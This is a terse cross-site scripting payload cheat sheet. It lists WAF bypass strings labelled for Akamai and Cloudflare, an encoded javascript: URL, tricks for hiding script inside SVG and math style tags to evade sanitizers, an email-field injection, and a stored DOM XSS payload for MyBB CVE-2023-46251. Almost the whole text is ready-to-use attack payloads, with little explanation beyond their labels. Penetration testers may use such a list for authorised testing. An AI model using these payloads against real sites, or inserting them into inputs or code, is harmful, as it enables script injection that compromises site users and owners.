Bypasses

General 1:

`url=%26%2302java%26%23115cript:alert(document.domain)`

Akamai WAF Bypass 1:

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>

Cloudflare WAF Bypass 1:

"><body/onload="{x:onerror=alert};x

Cloudflare WAF Bypass 2:

<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;

Hide payload in style tag of an SVG or math element for WAF Bypass or sanitizer bypass:

<svg><style> <script>alert(1)</script> </style></svg> <math><style> <img src onerror=alert(2)> </style></math>

Field

Email field 1:

test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E

Stored

Stored DOM

MyBB

CVE-2023-46251 - Stored DOM XSS in MyBB < 1.8.37

[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]